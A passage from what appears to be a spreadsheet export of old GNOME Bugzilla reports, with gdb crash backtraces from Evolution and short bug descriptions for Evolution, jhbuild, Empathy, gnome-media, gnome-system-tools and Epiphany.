#10 0xb57ff8fc in camel_imap_store_connected ()
   from /opt/gnome/lib/evolution-data-server-1.2/camel-providers/libcamelimap.so
No symbol table info available.
#11 0xb57fbc13 in imap_refresh_info ()
   from /opt/gnome/lib/evolution-data-server-1.2/camel-providers/libcamelimap.so
No symbol table info available.
#12 0xb7d37436 in disco_refresh_info ()
   from /opt/gnome/lib/libcamel-provider-1.2.so.8
No symbol table info available.
#13 0xb7d4833e in camel_folder_refresh_info ()
   from /opt/gnome/lib/libcamel-provider-1.2.so.8
No symbol table info available.
#14 0xb62fbcfa in refresh_folders_get ()
   from /opt/gnome/lib/evolution/2.8/components/libevolution-mail.so
No symbol table info available.
#15 0xb62f5d75 in mail_msg_received ()
   from /opt/gnome/lib/evolution/2.8/components/libevolution-mail.so
No symbol table info available.
#16 0xb79d3dd4 in thread_dispatch ()
   from /opt/gnome/lib/libedataserver-1.2.so.7
No symbol table info available.
#17 0xb728734b in start_thread () from /lib/libpthread.so.0
No symbol table info available.
#18 0xb679165e in clone () from /lib/libc.so.6
No symbol table info available.
Thread 7 (Thread -1258370144 (LWP 6453)):
#0  0xffffe410 in __kernel_vsyscall ()
No symbol table info available.
#1  0xb678ad11 in ___newselect_nocancel () from /lib/libc.so.6
No symbol table info available.
#2  0xb79d374c in e_msgport_wait () from /opt/gnome/lib/libedataserver-1.2.so.7
No symbol table info available.
#3  0xb7d17fae in ep_msg_send () from /opt/gnome/lib/libedataserverui-1.2.so.8
No symbol table info available.
#4  0xb7d19741 in e_passwords_ask_password ()
   from /opt/gnome/lib/libedataserverui-1.2.so.8
No symbol table info available.
#5  0xb62fe46d in get_password ()
   from /opt/gnome/lib/evolution/2.8/components/libevolution-mail.so
No symbol table info available.
#6  0xb7d58cf5 in camel_session_get_password ()
   from /opt/gnome/lib/libcamel-provider-1.2.so.8
No symbol table info available.
#7  0xb60147ee in pop3_try_authenticate ()
   from /opt/gnome/lib/evolution-data-server-1.2/camel-providers/libcamelpop3.so
No symbol table info available.
#8  0xb6014ce9 in pop3_connect ()
   from /opt/gnome/lib/evolution-data-server-1.2/camel-providers/libcamelpop3.so
No symbol table info available.
#9  0xb7d57bc3 in camel_service_connect ()
   from /opt/gnome/lib/libcamel-provider-1.2.so.8
No symbol table info available.
#10 0xb7d58f02 in camel_session_get_service_connected ()
   from /opt/gnome/lib/libcamel-provider-1.2.so.8
No symbol table info available.
#11 0xb6300352 in mail_tool_get_inbox ()
   from /opt/gnome/lib/evolution/2.8/components/libevolution-mail.so
No symbol table info available.
#12 0xb62faa46 in fetch_mail_fetch ()
   from /opt/gnome/lib/evolution/2.8/components/libevolution-mail.so
No symbol table info available.
#13 0xb62f5d75 in mail_msg_received ()
   from /opt/gnome/lib/evolution/2.8/components/libevolution-mail.so
No symbol table info available.
#14 0xb79d3dd4 in thread_dispatch ()
   from /opt/gnome/lib/libedataserver-1.2.so.7
No symbol table info available.
#15 0xb728734b in start_thread () from /lib/libpthread.so.0
No symbol table info available.
#16 0xb679165e in clone () from /lib/libc.so.6
No symbol table info available.
Thread 6 (Thread -1266762848 (LWP 6454)):
#0  0xffffe410 in __kernel_vsyscall ()
No symbol table info available.
#1  0xb728a7e6 in pthread_cond_wait@@GLIBC_2.3.2 () from /lib/libpthread.so.0
No symbol table info available.
#2  0xb79d2d66 in e_mutex_lock () from /opt/gnome/lib/libedataserver-1.2.so.7
No symbol table info available.
#3  0xb57fbc04 in imap_refresh_info ()
   from /opt/gnome/lib/evolution-data-server-1.2/camel-providers/libcamelimap.so
No symbol table info available.
#4  0xb7d37436 in disco_refresh_info ()
   from /opt/gnome/lib/libcamel-provider-1.2.so.8
No symbol table info available.
#5  0xb7d4833e in camel_folder_refresh_info ()
   from /opt/gnome/lib/libcamel-provider-1.2.so.8
No symbol table info available.
#6  0xb62fbcfa in refresh_folders_get ()
   from /opt/gnome/lib/evolution/2.8/components/libevolution-mail.so
No symbol table info available.
#7  0xb62f5d75 in mail_msg_received ()
   from /opt/gnome/lib/evolution/2.8/components/libevolution-mail.so
No symbol table info available.
#8  0xb79d3dd4 in thread_dispatch ()
   from /opt/gnome/lib/libedataserver-1.2.so.7
No symbol table info available.
#9  0xb728734b in start_thread () from /lib/libpthread.so.0
No symbol table info available.
#10 0xb679165e in clone () from /lib/libc.so.6
No symbol table info available.
Thread 5 (Thread -1283548256 (LWP 6458)):
#0  0xffffe410 in __kernel_vsyscall ()
No symbol table info available.
#1  0xb678ad11 in ___newselect_nocancel () from /lib/libc.so.6
No symbol table info available.
#2  0xb79d374c in e_msgport_wait () from /opt/gnome/lib/libedataserver-1.2.so.7
No symbol table info available.
#3  0xb7d17fae in ep_msg_send () from /opt/gnome/lib/libedataserverui-1.2.so.8
No symbol table info available.
#4  0xb7d19741 in e_passwords_ask_password ()
   from /opt/gnome/lib/libedataserverui-1.2.so.8
No symbol table info available.
#5  0xb62fe46d in get_password ()
   from /opt/gnome/lib/evolution/2.8/components/libevolution-mail.so
No symbol table info available.
#6  0xb7d58cf5 in camel_session_get_password ()
   from /opt/gnome/lib/libcamel-provider-1.2.so.8
No symbol table info available.
#7  0xb5804378 in imap_connect_online ()
   from /opt/gnome/lib/evolution-data-server-1.2/camel-providers/libcamelimap.so
No symbol table info available.
#8  0xb7d38776 in disco_connect ()
   from /opt/gnome/lib/libcamel-provider-1.2.so.8
No symbol table info available.
#9  0xb7d57bc3 in camel_service_connect ()
   from /opt/gnome/lib/libcamel-provider-1.2.so.8
No symbol table info available.
#10 0xb57ff8fc in camel_imap_store_connected ()
   from /opt/gnome/lib/evolution-data-server-1.2/camel-providers/libcamelimap.so
No symbol table info available.
#11 0xb5800fb5 in refresh_refresh ()
   from /opt/gnome/lib/evolution-data-server-1.2/camel-providers/libcamelimap.so
No symbol table info available.
#12 0xb7d59212 in session_thread_received ()
   from /opt/gnome/lib/libcamel-provider-1.2.so.8
No symbol table info available.
#13 0xb79d3dd4 in thread_dispatch ()
   from /opt/gnome/lib/libedataserver-1.2.so.7
No symbol table info available.
#14 0xb728734b in start_thread () from /lib/libpthread.so.0
No symbol table info available.
#15 0xb679165e in clone () from /lib/libc.so.6
No symbol table info available.
Thread 4 (Thread -1275155552 (LWP 6468)):
#0  0xffffe410 in __kernel_vsyscall ()
No symbol table info available.
#1  0xb678ad11 in ___newselect_nocancel () from /lib/libc.so.6
No symbol table info available.
#2  0xb79d374c in e_msgport_wait () from /opt/gnome/lib/libedataserver-1.2.so.7
No symbol table info available.
#3  0xb79d3e29 in thread_dispatch ()
   from /opt/gnome/lib/libedataserver-1.2.so.7
No symbol table info available.
#4  0xb728734b in start_thread () from /lib/libpthread.so.0
No symbol table info available.
#5  0xb679165e in clone () from /lib/libc.so.6
No symbol table info available.
Thread 3 (Thread -1292133472 (LWP 6469)):
#0  0xffffe410 in __kernel_vsyscall ()
No symbol table info available.
#1  0xb678ad11 in ___newselect_nocancel () from /lib/libc.so.6
No symbol table info available.
#2  0xb79d374c in e_msgport_wait () from /opt/gnome/lib/libedataserver-1.2.so.7
No symbol table info available.
#3  0xb79d3e29 in thread_dispatch ()
   from /opt/gnome/lib/libedataserver-1.2.so.7
No symbol table info available.
#4  0xb728734b in start_thread () from /lib/libpthread.so.0
No symbol table info available.
#5  0xb679165e in clone () from /lib/libc.so.6
No symbol table info available.
Thread 2 (Thread -1303450720 (LWP 6470)):
#0  0xffffe410 in __kernel_vsyscall ()
No symbol table info available.
#1  0xb6788193 in poll () from /lib/libc.so.6
No symbol table info available.
#2  0xb6825073 in g_main_context_iterate ()
   from /opt/gnome/lib/libglib-2.0.so.0
No symbol table info available.
#3  0xb68253e9 in g_main_loop_run () from /opt/gnome/lib/libglib-2.0.so.0
No symbol table info available.
#4  0xb72d4590 in link_io_thread_fn () from /opt/gnome/lib/libORBit-2.so.0
No symbol table info available.
#5  0xb684010f in g_thread_create_proxy () from /opt/gnome/lib/libglib-2.0.so.0
No symbol table info available.
#6  0xb728734b in start_thread () from /lib/libpthread.so.0
No symbol table info available.
#7  0xb679165e in clone () from /lib/libc.so.6
No symbol table info available.
Thread 1 (Thread -1234835264 (LWP 6441)):
#0  0xffffe410 in __kernel_vsyscall ()
No symbol table info available.
#1  0xb728e33b in __waitpid_nocancel () from /lib/libpthread.so.0
No symbol table info available.
#2  0xb77a3ced in libgnomeui_segv_handle ()
   from /opt/gnome/lib/libgnomeui-2.so.0
No symbol table info available.
#3  0x08060279 in segv_redirect ()
No symbol table info available.
#4  
No symbol table info available.
#5  0xb7eb8298 in e_task_bar_get_task_widget ()
   from /opt/gnome/lib/evolution/2.8/libemiscwidgets.so.0
No symbol table info available.
#6  0xb7e93d72 in e_activity_handler_operation_progressing ()
   from /opt/gnome/lib/evolution/2.8/libemiscwidgets.so.0
No symbol table info available.
#7  0xb62f67f6 in do_op_status ()
   from /opt/gnome/lib/evolution/2.8/components/libevolution-mail.so
No symbol table info available.
#8  0xb62f64de in mail_msgport_received ()
   from /opt/gnome/lib/evolution/2.8/components/libevolution-mail.so
No symbol table info available.
#9  0xb684ba4d in g_io_unix_dispatch () from /opt/gnome/lib/libglib-2.0.so.0
No symbol table info available.
#10 0xb6822002 in g_main_context_dispatch ()
   from /opt/gnome/lib/libglib-2.0.so.0
No symbol table info available.
#11 0xb682503f in g_main_context_iterate ()
   from /opt/gnome/lib/libglib-2.0.so.0
No symbol table info available.
#12 0xb68253e9 in g_main_loop_run () from /opt/gnome/lib/libglib-2.0.so.0
No symbol table info available.
#13 0xb752e9f3 in bonobo_main () from /opt/gnome/lib/libbonobo-2.so.0
No symbol table info available.
#14 0x080600a5 in main ()
No symbol table info available.
#0  0xffffe410 in __kernel_vsyscall ()
----------- .xsession-errors (21 sec old) ---------------------
** (bug-buddy:6472): WARNING **: Symbol fÃ¼r Yelp konnte nicht geladen werden
** (bug-buddy:6472): WARNING **: Symbol fÃ¼r Fensterliste konnte nicht geladen werden
** (bug-buddy:6472): WARNING **: Symbol fÃ¼r Benachrichtigungsfeld konnte nicht geladen werden
** (bug-buddy:6472): WARNING **: Symbol fÃ¼r ArbeitsflÃ¤chenumschalter konnte nicht geladen werden
** (bug-buddy:6472): WARNING **: Symbol fÃ¼r FensterwÃ¤hler konnte nicht geladen werden
** (bug-buddy:6472): WARNING **: Symbol fÃ¼r Desktop anzeigen konnte nicht geladen werden
** (bug-buddy:6472): WARNING **: Symbol fÃ¼r WÃ¶rterbuchsuche konnte nicht geladen werden
** (bug-buddy:6472): WARNING **: Symbol fÃ¼r Uhr konnte nicht geladen werden
--------------------------------------------------</t>
  </si>
  <si>
    <t>wagner.m01</t>
  </si>
  <si>
    <t>EVOLUTION-200287</t>
  </si>
  <si>
    <t>Re: Re:</t>
  </si>
  <si>
    <t>replying to a reply causes Re: Re: in header?
(Maybe Re:  Re:?)</t>
  </si>
  <si>
    <t>GNOME-SYSTEM-TOOLS-115923</t>
  </si>
  <si>
    <t>when editing a menu entry the root device selection may be broken</t>
  </si>
  <si>
    <t>When I edit the properties of a menu entry the root device selection is
always set to the first option in the OptionMenu leaving the possibility
of breaking the menu entry if the root device is other than the first one
(i.e: /dev/hdb1 when the first is /dev/hda1)</t>
  </si>
  <si>
    <t>JHBUILD-748737</t>
  </si>
  <si>
    <t>gobject-introspection in 3.14</t>
  </si>
  <si>
    <t>Should not gobject-introspection use gnome-3-14 branch? Trying to build GNOME 3.14 and got error that gobject-introspection requires glib 2.44 but in 3.14 version 2.42 is used.</t>
  </si>
  <si>
    <t>alberts.muktupavels</t>
  </si>
  <si>
    <t>EMPATHY-479697</t>
  </si>
  <si>
    <t>no sounds</t>
  </si>
  <si>
    <t>I activated the preferences to have sounds when people chat me but I get none. Is this feature implemented?</t>
  </si>
  <si>
    <t>EVOLUTION-409805</t>
  </si>
  <si>
    <t>snoozed alarms don't pop-up after evolution has been restarted</t>
  </si>
  <si>
    <t>Please describe the problem:
If I snooze an alarm and then close evolution and restart my computer I will not get re-minded of the appointment again. I listed this as priority = normal but in reality this causes me to miss events so I think its high priority. This is especially common for events that are one day out. Let's say I have an 11:30 appointment that is very important. I might schedule an alarm 1 day in advance then hit the snooze button telling it to remind me again in 12 hours. Then at the end of the day I shut down my computer expecting to be reminded again when I boot up in the morning. However I will not be reminded the next morning.
Having come to Evolution from Outlook this is very disturbing because I rely on my alarms.
Steps to reproduce:
1. Create an event a ways out
2. set an alarm to pop-up
3. snooze the alarm
4. reboot
Actual results:
Your snoozed alarm does not popup again
Expected results:
I would expect to continue to be reminded about events until I *dismiss* the alarm. This is actually a bit confusing because there is no dismiss button for alarms so if I have multiple alarms open I have to snooze all of them that I don't want to dismiss then dismiss the remaining ones and wait for the reminders to pop-up again. Its very unfortunate if I have to reboot and my reminders are lost for good.
Does this happen every time?
Yes
Other information:</t>
  </si>
  <si>
    <t>newz</t>
  </si>
  <si>
    <t>GNOME-MEDIA-153497</t>
  </si>
  <si>
    <t>[PATCH] HIG fixes for new mixer's preference dialog.</t>
  </si>
  <si>
    <t>The new volume control mixer's preference dialog could use a some HIG fixes.  I
will attach a patch with changelog.</t>
  </si>
  <si>
    <t>GNOME-MEDIA-4422</t>
  </si>
  <si>
    <t>gtcd doesn't check if gdk_font_load () succeeded</t>
  </si>
  <si>
    <t xml:space="preserve">Package: gtcd
Version: 1.0.51
Hi
apperantly gtcd doesnÂ´t check if the trackfont could be loaded. After a 
system upgrade I tried to use gtcd with the old configuration file that now 
pointed to an invalid (because nonexistant) font and gtcd crashed on startup. 
Replacing the font description in the configuration file solved the problem.
I would commit a fix but I don't have a recent checkout of gnome-media and I 
have no clue what branch this fix should go into. It should be trivial 
however...
Salut Sven
------- Bug moved to this database by debbugs-export@bugzilla.gnome.org 2001-01-28 11:30 -------
This bug was previously known as bug 4422 at http://bugs.gnome.org/
http://bugs.gnome.org/show_bug.cgi?id=4422
Originally filed under the gnome-media product and gtcd component.
Unknown version 1.0.x in product gnome-media. Setting version to the default unspecified.
The original reporter (neumanns@uni-duesseldorf.de) of this bug does not have an account here.
Reassigning to the exporter debbugs-export@bugzilla.gnome.org.
Reassigning to the default owner of the component peter@ximian.com.
</t>
  </si>
  <si>
    <t>neumanns</t>
  </si>
  <si>
    <t>EPIPHANY-319672</t>
  </si>
  <si>
    <t>Move on toolbar context menu option doesn't work</t>
  </si>
  <si>
    <t>If I right click on a bookmark and select Move on toolbar the bookmark
disappears from the toolbar but I can't get it back moving the mouse cursor to
the new position does nothing I have to press Escape which gets the item back
on the toolbar in the old position
(just tested this fails for normal toolbar items too)</t>
  </si>
  <si>
    <t>EVOLUTION-211155</t>
  </si>
  <si>
    <t>crash on send</t>
  </si>
  <si>
    <t xml:space="preserve">Package: Evolution
Priority: Normal
Version: 0.14.99
Synopsis: crash on send (e_msgport_put)
Bugzilla-Product: Evolution
Bugzilla-Component: Mailer
Description:
I just clicked send. Not sure what went wrong. One thing that
bug-buddy didn't
catch:
#11 0xffc4dd8 in e_msgport_put (mp=0x1010ac40 msg=0x10321560)
    at e-msgport.c:169
169		g_mutex_unlock(mp-&gt;lock)
(gdb) p *mp
$1 = {queue = {head = 0x1010ac44 tail = 0x0 tailpred = 0x1010ac40} 
  condwait = 2 pipe = {pipe = {-1 -1} fd = {read = -1 write = -1}}
  cond = 0x1010ac88 lock = 0x1010ac68}
Debugging Information:
0xeddc0b0 in wait4 () at soinit.c:64
#0  0xeddc0b0 in wait4 () at soinit.c:64
#1  0xeddc064 in __libc_waitpid (pid=512 stat_loc=0x7fffd6f8 options=0)
    at ../sysdeps/unix/sysv/linux/waitpid.c:26
#2  0xef12e38 in waitpid (pid=19929 stat_loc=0x7fffd6f8 options=0)
    at wrapsyscall.c:173
#3  0xf73cdb0 in gnome_segv_handle (signum=11) at gnome-init.c:659
#4  0x10058930 in segv_redirect (sig=11) at main.c:67
#5  0xef100b4 in pthread_sighandler (signo=11 ctx=0x7fffd790) at signals.c:97
#6  
#7  0xed66d68 in kill () at soinit.c:64
#8  0xef0fca8 in __pthread_restart_new (th=0x0) at pthread.c:1030
#9  0xef12328 in __pthread_alt_unlock (lock=0x1010ac78) at restart.h:24
#10 0xef0e36c in __pthread_mutex_unlock (mutex=0x1010ac68) at mutex.c:195
#11 0xffc4dd8 in e_msgport_put (mp=0x1010ac40 msg=0x10321560)
    at e-msgport.c:169
#12 0xffc5940 in e_thread_put (e=0x1010abf0 msg=0x10321560) at e-msgport.c:600
#13 0x1004ebd8 in mail_send_mail (uri=0x140  
    message=0x101dc0a4 done=0x10033448  data=0x10320708)
    at mail-ops.c:608
#14 0x10033a7c in composer_send_cb (composer=0x10266f28 data=0x20)
    at mail-callbacks.c:570
#15 0xf3a7288 in gtk_marshal_NONE__NONE (object=0x0 func=0x25 
    func_data=0x7efffa88 args=0x148) at gtkmarshal.c:312
#16 0xf3e4394 in gtk_handlers_run (handlers=0x102efd90 signal=0x7fffdb98 
    object=0x10266f28 params=0x7fffdc80 after=0) at gtksignal.c:1917
#17 0xf3e3400 in gtk_signal_real_emit (object=0x10266f28 signal_id=220 
    params=0x7fffdc80) at gtksignal.c:1477
#18 0xf3e0a48 in gtk_signal_emit (object=0x10266f28 signal_id=220)
    at gtksignal.c:552
#19 0x10066600 in menu_file_send_cb (uic=0x0 data=0x10266f28 
    path=0x7efffa88 ) at e-msg-composer.c:1394
#20 0xf8d7fb8 in impl_Bonobo_UIComponent_execVerb (servant=0x0 
    cname=0x102f4ab8 FileSend ev=0x7efffa88) at bonobo-ui-component.c:123
#21 0xfad117c in Bonobo_UIComponent_execVerb (_obj=0x10268294 
    cname=0x102f4ab8 FileSend ev=0x7fffe008) at Bonobo-stubs.c:7746
#22 0xf8df648 in real_exec_verb (engine=0x10267048 
    component_name=0x10268600 evolution-message-composer 
    verb=0x102f4ab8 FileSend) at bonobo-ui-engine.c:1364
#23 0xf8df834 in impl_emit_verb_on (engine=0x10267048 node=0x102f4ab8)
    at bonobo-ui-engine.c:1412
#24 0xf3a70dc in gtk_marshal_NONE__POINTER (object=0x0 func=0x25 
    func_data=0x7efffa88 args=0x148) at gtkmarshal.c:193
#25 0xf3e3448 in gtk_signal_real_emit (object=0x10267048 signal_id=224 
    params=0x7fffe150) at gtksignal.c:1492
#26 0xf3e0a48 in gtk_signal_emit (object=0x10267048 signal_id=224)
    at gtksignal.c:552
#27 0xf8e1fb0 in bonobo_ui_engine_emit_verb_on_w (engine=0x10267048 
    widget=0x20) at bonobo-ui-engine.c:2762
#28 0xf8e91d0 in exec_verb_cb (item=0x102955b0 engine=0x10267048)
    at bonobo-ui-sync-toolbar.c:214
#29 0xf3a7288 in gtk_marshal_NONE__NONE (object=0x0 func=0x25 
    func_data=0x7efffa88 args=0x148) at gtkmarshal.c:312
#30 0xf3e4394 in gtk_handlers_run (handlers=0x10290ea0 signal=0x7fffe508 
    object=0x102955b0 params=0x7fffe5f0 after=0) at gtksignal.c:1917
#31 0xf3e3400 in gtk_signal_real_emit (object=0x102955b0 signal_id=243 
    params=0x7fffe5f0) at gtksignal.c:1477
#32 0xf3e0a48 in gtk_signal_emit (object=0x102955b0 signal_id=243)
    at gtksignal.c:552
#33 0xf8f11b8 in bonobo_ui_toolbar_item_activate (item=0x102955b0)
    at bonobo-ui-toolbar-item.c:486
#34 0xf8eb0e4 in button_widget_clicked_cb (button=0x0 data=0x102955b0)
    at bonobo-ui-toolbar-button-item.c:212
#35 0xf3a7288 in gtk_marshal_NONE__NONE (object=0x0 func=0x25 
    func_data=0x7efffa88 args=0x148) at gtkmarshal.c:312
#36 0xf3e4394 in gtk_handlers_run (handlers=0x10291020 signal=0x7fffe9a8 
    object=0x10165d10 params=0x7fffea90 after=0) at gtksignal.c:1917
#37 0xf3e3400 in gtk_signal_real_emit (object=0x10165d10 signal_id=92 
    params=0x7fffea90) at gtksignal.c:1477
#38 0xf3e0a48 in gtk_signal_emit (object=0x10165d10 signal_id=92)
    at gtksignal.c:552
#39 0xf32b818 in gtk_button_clicked (button=0x10165d10) at gtkbutton.c:336
#40 0xf32d4a4 in gtk_real_button_released (button=0x10165d10)
    at gtkbutton.c:861
#41 0xf3a7288 in gtk_marshal_NONE__NONE (object=0x0 func=0x25 
    func_data=0x7efffa88 args=0x148) at gtkmarshal.c:312
#42 0xf3e3294 in gtk_signal_real_emit (object=0x10165d10 signal_id=91 
    params=0x7fffef00) at gtksignal.c:1440
#43 0xf3e0a48 in gtk_signal_emit (object=0x10165d10 signal_id=91)
    at gtksignal.c:552
#44 0xf32b714 in gtk_button_released (button=0x10165d10) at gtkbutton.c:327
#45 0xf32cc24 in gtk_button_button_release (widget=0x10165d10 
    event=0x1015c7f0) at gtkbutton.c:721
#46 0xf3a6e04 in gtk_marshal_BOOL__POINTER (object=0x0 func=0x25 
    func_data=0x7efffa88 args=0x148) at gtkmarshal.c:28
#47 0xf3e3448 in gtk_signal_real_emit (object=0x10165d10 signal_id=48 
    params=0x7ffff380) at gtksignal.c:1492
#48 0xf3e0a48 in gtk_signal_emit (object=0x10165d10 signal_id=48)
    at gtksignal.c:552
#49 0xf4276ec in gtk_widget_event (widget=0x10165d10 event=0x1015c7f0)
    at gtkwidget.c:2864
#50 0xf3a6d18 in gtk_propagate_event (widget=0x10165d10 event=0x1015c7f0)
    at gtkmain.c:1378
#51 0xf3a589c in gtk_main_do_event (event=0x1015c7f0) at gtkmain.c:818
#52 0xf27ae18 in gdk_event_dispatch (source_data=0x0 current_time=0x20 
    user_data=0x7efffa88) at gdkevents.c:2139
#53 0xee88db4 in g_main_dispatch (dispatch_time=0x7ffff778) at gmain.c:656
#54 0xee89420 in g_main_iterate (block=269258720 dispatch=1) at gmain.c:877
#55 0xee89664 in g_main_run (loop=0x100dce78) at gmain.c:935
#56 0xf3a5064 in gtk_main () at gtkmain.c:524
#57 0xfaf8afc in bonobo_main () at bonobo-main.c:283
#58 0x10058ae8 in main (argc=3 argv=0x7ffff9a4) at main.c:141
#59 0xed540f8 in __libc_start_main (argc=3 ubp_av=0x7ffff9a4 
    ubp_ev=0x7efffa88 auxvec=0x7ffffa4c rtld_fini=0 stinfo=0x1009d700 
    stack_on_entry=0x0) at ../sysdeps/powerpc/elf/libc-start.c:119
Thread 6 (Thread 19866):
#0  0xed680b8 in __syscall_rt_sigsuspend () at soinit.c:64
#1  0xed66da8 in __sigsuspend (set=0xfffffffc)
    at ../sysdeps/unix/sysv/linux/sigsuspend.c:45
#2  0xef0fc50 in __pthread_wait_for_restart_signal (self=0x7f1ffc00)
    at pthread.c:926
#3  0xef0bea8 in pthread_cond_wait (cond=0x1 mutex=0x1010ac68) at restart.h:34
#4  0xffc4f14 in e_msgport_wait (mp=0x1010ac40) at e-msgport.c:193
#5  0xffc573c in thread_dispatch (din=0xfffffffc) at e-msgport.c:512
#6  0xef0ce84 in pthread_start_thread (arg=0xfffffffc) at manager.c:274
#7  0xee0211c in clone () at soinit.c:64
Thread 5 (Thread 19869):
#0  0xed680b8 in __syscall_rt_sigsuspend () at soinit.c:64
#1  0xed66da8 in __sigsuspend (set=0xfffffffc)
    at ../sysdeps/unix/sysv/linux/sigsuspend.c:45
#2  0xef0fc50 in __pthread_wait_for_restart_signal (self=0x7f3ffc00)
    at pthread.c:926
#3  0xef0bea8 in pthread_cond_wait (cond=0x1 mutex=0x1010ac68) at restart.h:34
#4  0xffc4f14 in e_msgport_wait (mp=0x1010ac40) at e-msgport.c:193
#5  0xffc573c in thread_dispatch (din=0xfffffffc) at e-msgport.c:512
#6  0xef0ce84 in pthread_start_thread (arg=0xfffffffc) at manager.c:274
#7  0xee0211c in clone () at soinit.c:64
Thread 4 (Thread 19862):
#0  0xed680b8 in __syscall_rt_sigsuspend () at soinit.c:64
#1  0xed66da8 in __sigsuspend (set=0xfffffffc)
    at ../sysdeps/unix/sysv/linux/sigsuspend.c:45
#2  0xef0fc50 in __pthread_wait_for_restart_signal (self=0x7f5ffc00)
    at pthread.c:926
#3  0xef0bea8 in pthread_cond_wait (cond=0x1 mutex=0x1010abc0) at restart.h:34
#4  0xffc4f14 in e_msgport_wait (mp=0x1010ab98) at e-msgport.c:193
#5  0xffc573c in thread_dispatch (din=0xfffffffc) at e-msgport.c:512
#6  0xef0ce84 in pthread_start_thread (arg=0xfffffffc) at manager.c:274
#7  0xee0211c in clone () at soinit.c:64
Thread 3 (Thread 19861):
#0  0xed680b8 in __syscall_rt_sigsuspend () at soinit.c:64
#1  0xed66da8 in __sigsuspend (set=0xfffffffc)
    at ../sysdeps/unix/sysv/linux/sigsuspend.c:45
#2  0xef0fc50 in __pthread_wait_for_restart_signal (self=0x7f7ffc00)
    at pthread.c:926
#3  0xef0bea8 in pthread_cond_wait (cond=0x1 mutex=0x1010ab18) at restart.h:34
#4  0xffc4f14 in e_msgport_wait (mp=0x1010aaf0) at e-msgport.c:193
#5  0xffc573c in thread_dispatch (din=0xfffffffc) at e-msgport.c:512
#6  0xef0ce84 in pthread_start_thread (arg=0xfffffffc) at manager.c:274
#7  0xee0211c in clone () at soinit.c:64
Thread 2 (Thread 19817 (initial thread)):
#0  0xeddc0b0 in wait4 () at soinit.c:64
#1  0xeddc064 in __libc_waitpid (pid=512 stat_loc=0x7fffd6f8 options=0)
    at ../sysdeps/unix/sysv/linux/waitpid.c:26
#2  0xef12e38 in waitpid (pid=19929 stat_loc=0x7fffd6f8 options=0)
    at wrapsyscall.c:173
#3  0xf73cdb0 in gnome_segv_handle (signum=11) at gnome-init.c:659
#4  0x10058930 in segv_redirect (sig=11) at main.c:67
#5  0xef100b4 in pthread_sighandler (signo=11 ctx=0x7fffd790) at signals.c:97
#6  
#7  0xed66d68 in kill () at soinit.c:64
#8  0xef0fca8 in __pthread_restart_new (th=0x0) at pthread.c:1030
#9  0xef12328 in __pthread_alt_unlock (lock=0x1010ac78) at restart.h:24
#10 0xef0e36c in __pthread_mutex_unlock (mutex=0x1010ac68) at mutex.c:195
#11 0xffc4dd8 in e_msgport_put (mp=0x1010ac40 msg=0x10321560)
    at e-msgport.c:169
#12 0xffc5940 in e_thread_put (e=0x1010abf0 msg=0x10321560) at e-msgport.c:600
#13 0x1004ebd8 in mail_send_mail (uri=0x140  
    message=0x101dc0a4 done=0x10033448  data=0x10320708)
    at mail-ops.c:608
#14 0x10033a7c in composer_send_cb (composer=0x10266f28 data=0x20)
    at mail-callbacks.c:570
#15 0xf3a7288 in gtk_marshal_NONE__NONE (object=0x0 func=0x25 
    func_data=0x7efffa88 args=0x148) at gtkmarshal.c:312
#16 0xf3e4394 in gtk_handlers_run (handlers=0x102efd90 signal=0x7fffdb98 
    object=0x10266f28 params=0x7fffdc80 after=0) at gtksignal.c:1917
#17 0xf3e3400 in gtk_signal_real_emit (object=0x10266f28 signal_id=220 
    params=0x7fffdc80) at gtksignal.c:1477
#18 0xf3e0a48 in gtk_signal_emit (object=0x10266f28 signal_id=220)
    at gtksignal.c:552
#19 0x10066600 in menu_file_send_cb (uic=0x0 data=0x10266f28 
    path=0x7efffa88 ) at e-msg-composer.c:1394
#20 0xf8d7fb8 in impl_Bonobo_UIComponent_execVerb (servant=0x0 
    cname=0x102f4ab8 FileSend ev=0x7efffa88) at bonobo-ui-component.c:123
#21 0xfad117c in Bonobo_UIComponent_execVerb (_obj=0x10268294 
    cname=0x102f4ab8 FileSend ev=0x7fffe008) at Bonobo-stubs.c:7746
#22 0xf8df648 in real_exec_verb (engine=0x10267048 
    component_name=0x10268600 evolution-message-composer 
    verb=0x102f4ab8 FileSend) at bonobo-ui-engine.c:1364
#23 0xf8df834 in impl_emit_verb_on (engine=0x10267048 node=0x102f4ab8)
    at bonobo-ui-engine.c:1412
#24 0xf3a70dc in gtk_marshal_NONE__POINTER (object=0x0 func=0x25 
    func_data=0x7efffa88 args=0x148) at gtkmarshal.c:193
#25 0xf3e3448 in gtk_signal_real_emit (object=0x10267048 signal_id=224 
    params=0x7fffe150) at gtksignal.c:1492
#26 0xf3e0a48 in gtk_signal_emit (object=0x10267048 signal_id=224)
    at gtksignal.c:552
#27 0xf8e1fb0 in bonobo_ui_engine_emit_verb_on_w (engine=0x10267048 
    widget=0x20) at bonobo-ui-engine.c:2762
#28 0xf8e91d0 in exec_verb_cb (item=0x102955b0 engine=0x10267048)
    at bonobo-ui-sync-toolbar.c:214
#29 0xf3a7288 in gtk_marshal_NONE__NONE (object=0x0 func=0x25 
    func_data=0x7efffa88 args=0x148) at gtkmarshal.c:312
#30 0xf3e4394 in gtk_handlers_run (handlers=0x10290ea0 signal=0x7fffe508 
    object=0x102955b0 params=0x7fffe5f0 after=0) at gtksignal.c:1917
#31 0xf3e3400 in gtk_signal_real_emit (object=0x102955b0 signal_id=243 
    params=0x7fffe5f0) at gtksignal.c:1477
#32 0xf3e0a48 in gtk_signal_emit (object=0x102955b0 signal_id=243)
    at gtksignal.c:552
#33 0xf8f11b8 in bonobo_ui_toolbar_item_activate (item=0x102955b0)
    at bonobo-ui-toolbar-item.c:486
#34 0xf8eb0e4 in button_widget_clicked_cb (button=0x0 data=0x102955b0)
    at bonobo-ui-toolbar-button-item.c:212
#35 0xf3a7288 in gtk_marshal_NONE__NONE (object=0x0 func=0x25 
    func_data=0x7efffa88 args=0x148) at gtkmarshal.c:312
#36 0xf3e4394 in gtk_handlers_run (handlers=0x10291020 signal=0x7fffe9a8 
    object=0x10165d10 params=0x7fffea90 after=0) at gtksignal.c:1917
#37 0xf3e3400 in gtk_signal_real_emit (object=0x10165d10 signal_id=92 
    params=0x7fffea90) at gtksignal.c:1477
#38 0xf3e0a48 in gtk_signal_emit (object=0x10165d10 signal_id=92)
    at gtksignal.c:552
#39 0xf32b818 in gtk_button_clicked (button=0x10165d10) at gtkbutton.c:336
#40 0xf32d4a4 in gtk_real_button_released (button=0x10165d10)
    at gtkbutton.c:861
